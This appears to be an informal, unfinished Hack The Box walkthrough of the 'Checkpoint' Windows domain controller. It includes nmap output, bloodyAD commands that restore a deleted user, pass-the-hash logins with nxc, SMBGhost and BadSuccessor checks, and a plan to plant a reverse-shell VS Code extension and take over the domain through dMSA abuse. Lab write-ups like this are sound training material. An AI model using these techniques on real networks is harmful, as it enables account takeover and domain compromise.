CHECKPOINT HTB
This machine includes initial access credentials : username: alex.turner | password: Checkpoint2024!. 2024 might be an idea to look into, like its a web app that wouldn’t have been updated recently. First thing i notice from the nmap scan is that the machine is a Windows OS and it most likely has kerberos running on a domain controller(DC01), we might have to do some kerberoasting for tickets. Notably i tried connecting to the traceroute second address (10.10.14.1:4000) and the connection got refused, there’s a good chance we have to connect from 10.129.12.40 to 10.10.14.1:4000 or that we need to sign into kerberos first.
Enumeration:
nmap -sV -v -A -sC 10.129.12.40
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-14 20:42:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: checkpoint.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: checkpoint.htb, Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2012|2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows 11 24H2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.023 days (since Sun Jun 14 09:10:21 2026)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
> Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time:
| date: 2026-06-14T20:42:45
|_ start_date: N/A
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 72.29 ms 10.10.14.1
2 73.23 ms checkpoint.htb (10.129.12.40)
bloodyad –host 10.129.14.173 –dns 10.129.14.173 -d checkpoint.htb -u alex.turner -p Checkpoint2024! get writable
distinguishedName: CN=Deleted Objects,DC=checkpoint,DC=htb
DACL: WRITE
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=checkpoint,DC=htb
permission: WRITE
distinguishedName: OU=Employees,DC=checkpoint,DC=htb
permission: CREATE_CHILD
distinguishedName: CN=Alex Turner,OU=Employees,DC=checkpoint,DC=htb
permission: WRITE
distinguishedName: CN=Mark Davies,OU=Employees,DC=checkpoint,DC=htb
permission: WRITE
distinguishedName: DC=checkpoint.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=checkpoint,DC=htb
permission: CREATE_CHILD
distinguishedName: DC=_msdcs.checkpoint.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=checkpoint,DC=htb
permission: CREATE_CHILD
bloodyad –host 10.129.14.173 –dns 10.129.14.173 -d checkpoint.htb -u alex.turner -p Checkpoint2024! set restore mark.davies
[+] mark.davies has been restored successfully under CN=Mark Davies,OU=Employees,DC=checkpoint,DC=htb
Went to Cyberchef.org there’s a NTHASH encoder on there which we’re going to use on “Checkpoint2024!” as it is being reused for our disabled user: mark.davies. We double check by removing our password flag “-p” with -H for our hash, run that, hey it works, good. Now that we have READ,WRITE permissions on the DevDrop share. Seems like we could maybe inject a malicious extension for Vscode, so we need to make a Windows powershell reverse shell and embed it inside our vscode extension.
n(xc smb 10.129.12.40 -d checkpoint.htb -u mark.davies -H “0B28E49D9DEB96F99D74578E214FAEC2” -M smbghost
SMB 10.129.14.173 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:checkpoint.htb) (signing:True) (SMBv1:None)
SMB 10.129.14.173 445 DC01 [+] checkpoint.htb.davies:0B28E49D9DEB96F99D74578E214FAEC2
SMBGHOST 10.129.14.173 445 DC01 Potentially vulnerable to SMBGhost (CVE-2020-0796)
nxc ldap 10.129.12.40 -d checkpoint.htb -u mark.davies -p Checkpoint2024! -m badsuccessor
LDAP 10.129.31.247 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:checkpoint.htb) (signing:Enforced) (channel binding:No TLS cert)
LDAP 10.129.31.247 389 DC01 [+] checkpoint.htb.davies:Checkpoint2024!
BADSUCCE… 10.129.31.247 389 DC01 [+] Found domain controller with operating system Windows Server 2025: Unknown IP (DC01.checkpoint.htb)
BADSUCCE… 10.129.31.247 389 DC01 [+] Found 2 results
BADSUCCE… 10.129.31.247 389 DC01 alex.turner (S-1-5-21-3129162710-3498938529-1807524340-1101), OU=Employees,DC=checkpoint,DC=htb
BADSUCCE… 10.129.31.247 389 DC01 ryan.brooks (S-1-5-21-3129162710-3498938529-1807524340-1103), OU=DMSAHolder,DC=checkpoint,DC=htb
If we manage to get ryan.brooks permissions we should be able to make an badsuccessor attack and bind a dMSA account to admin giving us full access to the Domain controller.